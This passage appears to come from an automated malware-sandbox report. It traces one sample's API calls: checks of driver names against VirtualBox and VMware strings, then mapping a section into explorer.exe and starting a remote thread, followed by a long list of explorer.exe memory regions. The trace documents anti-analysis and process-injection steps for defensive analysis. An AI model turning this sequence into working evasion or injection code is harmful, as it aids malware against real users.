returned 0x0 [0060.845] strstr (_Str="ataport.sys", _SubStr="vboxvi") returned 0x0 [0060.845] strstr (_Str="ataport.sys", _SubStr="vboxdi") returned 0x0 [0060.845] strstr (_Str="ataport.sys", _SubStr="vioser") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vmci.s") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vmusbm") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vmmous") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vm3dmp") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vmrawd") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vmmemc") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vboxgu") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vboxsf") returned 0x0 [0060.845] strstr (_Str="msahci.sys", _SubStr="vboxmo") returned 0x0 [0060.847] LocalFree (hMem=0x414948) returned 0x0 [0060.847] Sleep (dwMilliseconds=0x1388) [0065.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ff24*=0x0, ZeroBits=0x0, RegionSize=0x18ff2c*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ff24*=0x290000, RegionSize=0x18ff2c*=0x6000) returned 0x0 [0065.855] GetShellWindow () returned 0x100e6 [0065.856] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x18fed0 | out: lpdwProcessId=0x18fed0) returned 0x13c [0065.857] NtOpenProcess (in: ProcessHandle=0x18ff20, DesiredAccess=0x40, ObjectAttributes=0x18ff08*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ff00*(UniqueProcess=0x390, UniqueThread=0x0) | out: ProcessHandle=0x18ff20*=0x80) returned 0x0 [0065.858] NtDuplicateObject (in: SourceProcessHandle=0x80, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ff24, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ff24*=0x84) returned 0x0 [0065.858] NtCreateSection (in: SectionHandle=0x18fedc, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fedc*=0x88) returned 0x0 [0065.858] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x18feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18feec*=0x2a0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0065.859] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0x84, BaseAddress=0x18fef4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fef4*=0x3900000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0068.106] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a0000, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe")) returned 0x5f [0068.106] NtCreateSection (in: SectionHandle=0x18fed8, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fed8*=0x8c) returned 0x0 [0068.106] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x18fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fee8*=0x2b0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0068.106] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x84, BaseAddress=0x18fef0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18fef0*=0x3930000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0068.108] RtlCreateUserThread (in: ProcessHandle=0x84, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x3931930, Parameter=0x3900000, ThreadHandle=0x18fe30*=0x77a16c9a77a16c93, ClientId=0x0 | out: ThreadHandle=0x18fe30*=0x90, ClientId=0x0) returned 0x0 [0068.110] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x8651000" os_pid = "0x390" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 379 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 380 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 381 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 382 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 383 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 384 start_va = 0xc0000 end_va = 0xc5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 385 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 386 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 387 start_va = 0xf0000 end_va = 0xfcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 388 start_va = 0x100000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 389 start_va = 0x110000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 390 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 391 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 392 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 393 start_va = 0x2e0000 end_va = 0x3befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 394 start_va = 0x3c0000 end_va = 0x3c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 395 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 396 start_va = 0x3e0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 397 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 398 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 399 start_va = 0x800000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 400 start_va = 0x1c00000 end_va = 0x1c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 401 start_va = 0x1c10000 end_va = 0x1c29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 402 start_va = 0x1c30000 end_va = 0x1c30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 403 start_va = 0x1c40000 end_va = 0x1c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 404 start_va = 0x1c50000 end_va = 0x1c61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 405 start_va = 0x1c70000 end_va = 0x1c72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 406 start_va = 0x1c80000 end_va = 0x1c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 407 start_va = 0x1c90000 end_va = 0x1c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 408 start_va = 0x1ca0000 end_va = 0x1ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 409 start_va = 0x1cb0000 end_va = 0x1cb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 410 start_va = 0x1cc0000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 411 start_va = 0x1d40000 end_va = 0x1d41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 412 start_va = 0x1d50000 end_va = 0x1d52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 413 start_va = 0x1d60000 end_va = 0x1d60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 414 start_va = 0x1d70000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 415 start_va = 0x1df0000 end_va = 0x20befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 416 start_va = 0x20c0000 end_va = 0x211bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 417 start_va = 0x2120000 end_va = 0x2125fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 418 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 419 start_va = 0x2140000 end_va = 0x2148fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 420 start_va = 0x2150000 end_va = 0x2150fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 421 start_va = 0x2160000 end_va = 0x2176fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 422 start_va = 0x2180000 end_va = 0x2180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 423 start_va = 0x2190000 end_va = 0x2193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 424 start_va = 0x21a0000 end_va = 0x21a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 425 start_va = 0x21b0000 end_va = 0x21b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 426 start_va = 0x21c0000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 427 start_va = 0x2220000 end_va = 0x229dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 428 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 429 start_va = 0x23a0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 430 start_va = 0x23d0000 end_va = 0x23d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 431 start_va = 0x23e0000 end_va = 0x23e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 432 start_va = 0x23f0000 end_va = 0x23f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 433 start_va = 0x2400000 end_va = 0x2400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002400000" filename = "" Region: id = 434 start_va = 0x2410000 end_va = 0x2410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 435 start_va = 0x2420000 end_va = 0x2421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002420000" filename = "" Region: id = 436 start_va = 0x2430000 end_va = 0x2433fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 437 start_va = 0x2440000 end_va = 0x2440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 438 start_va = 0x2450000 end_va = 0x2450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 439 start_va = 0x2460000 end_va = 0x2460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 440 start_va = 0x2470000 end_va = 0x247efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 441 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 442 start_va = 0x2580000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 443 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 444 start_va = 0x2780000 end_va = 0x2781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 445 start_va = 0x2790000 end_va = 0x2791fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 446 start_va = 0x27a0000 end_va = 0x27a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 447 start_va = 0x27b0000 end_va = 0x27b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 448 start_va = 0x27c0000 end_va = 0x27c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 449 start_va = 0x27d0000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 450 start_va = 0x2850000 end_va = 0x2850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 451 start_va = 0x2860000 end_va = 0x2860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 452 start_va = 0x2870000 end_va = 0x2870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 453 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 454 start_va = 0x2890000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 455 start_va = 0x2910000 end_va = 0x2911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002910000" filename = "" Region: id = 456 start_va = 0x2920000 end_va = 0x2920fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 457 start_va = 0x2930000 end_va = 0x2934fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 458 start_va = 0x2940000 end_va = 0x2970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 459 start_va = 0x2980000 end_va = 0x2983fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 460 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 461 start_va = 0x29a0000 end_va = 0x29a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 462 start_va = 0x29b0000 end_va = 0x29bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 463 start_va = 0x29c0000 end_va = 0x29c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 464 start_va = 0x29d0000 end_va = 0x29d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 465 start_va = 0x29e0000 end_va = 0x29edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 466 start_va = 0x29f0000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 467 start_va = 0x2a70000 end_va = 0x2ad5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 468 start_va = 0x2ae0000 end_va = 0x2ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 469 start_va = 0x2af0000 end_va = 0x2b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 470 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 471 start_va = 0x2b80000 end_va = 0x2b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 472 start_va = 0x2b90000 end_va = 0x2b93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 473 start_va = 0x2ba0000 end_va = 0x2ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 474 start_va = 0x2bb0000 end_va = 0x2bb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 475 start_va = 0x2bc0000 end_va = 0x2bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bc0000" filename = "" Region: id = 476 start_va = 0x2bd0000 end_va = 0x2bd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 477 start_va = 0x2be0000 end_va = 0x2be3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 478 start_va = 0x2bf0000 end_va = 0x2bf0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 479 start_va = 0x2c00000 end_va = 0x2c03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 480 start_va = 0x2c10000 end_va = 0x2c10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{228385D3-B646-481B-B0DE-F0C3A58F5423}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db") Region: id = 481 start_va = 0x2c20000 end_va = 0x2c23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 482 start_va = 0x2c30000 end_va = 0x2c30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{87178F01-581A-45F0-9991-3F918FAA83F1}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db") Region: id = 483 start_va = 0x2c40000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 484 start_va = 0x2cc0000 end_va = 0x35effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 485 start_va = 0x35f0000 end_va = 0x35f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 486 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{C353F91E-D25F-48F0-A2CD-9F60B2681E9A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db") Region: id = 487 start_va = 0x3610000 end_va = 0x3613fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 488 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{2F368D22-02BF-4413-97D1-C886CB140911}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db") Region: id = 489 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 